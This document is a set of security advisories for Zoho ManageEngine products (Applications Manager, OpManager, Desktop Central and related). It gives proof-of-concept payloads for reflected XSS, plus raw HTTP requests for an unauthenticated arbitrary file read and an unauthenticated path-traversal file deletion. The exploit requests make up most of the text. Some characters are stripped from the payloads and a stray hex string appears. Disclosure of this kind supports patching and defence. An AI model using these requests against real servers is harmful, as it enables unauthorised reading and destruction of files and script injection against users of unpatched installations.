Zoho ManageEngine version 13 (13790 build) suffers from file read, file deletion, and cross site scripting vulnerabilities.
07e48d82fe5c4fd7c8247ea8ca287c85This issue has been reported to the vendor who has already published patches for this issue.
https://www.manageengine.com/products/applications_manager/issues.html
==========================
Advisory:Zoho manageengine Applications Manager Reflected XSSVulnerability
Author: M3 From DBAppSecurity
Affected Version: All
==========================
Proof of Concept:
==========================
/GraphicalView.do?method=createBusinessService"scriptalert(5045)/script
Notice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue.
http://opmanager.helpdocsonline.com/read-me
==========================
Advisory:Zoho manageengine Arbitrary File Read in multiple Products
Author: M3 From DBAppSecurity
Affected Products:
Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer
==========================
Proof of Concept:
==========================
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx
Notice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue.
==========================
Advisory: Zoho manageengine Desktop Central Arbitrary File Deletion
Author: M3 From DBAppSecurity
Affected Products:Desktop Central
==========================
Proof of Concept:
==========================
POST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif
Notice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue.
http://opmanager.helpdocsonline.com/read-me
==========================
Advisory: Zoho manageengine Reflected XSS in multiple Products
Author: M3 From DBAppSecurity
Affected Products:
Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer
==========================
Proof of Concept:
==========================
/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script
Notice: This vul can reproduce without login.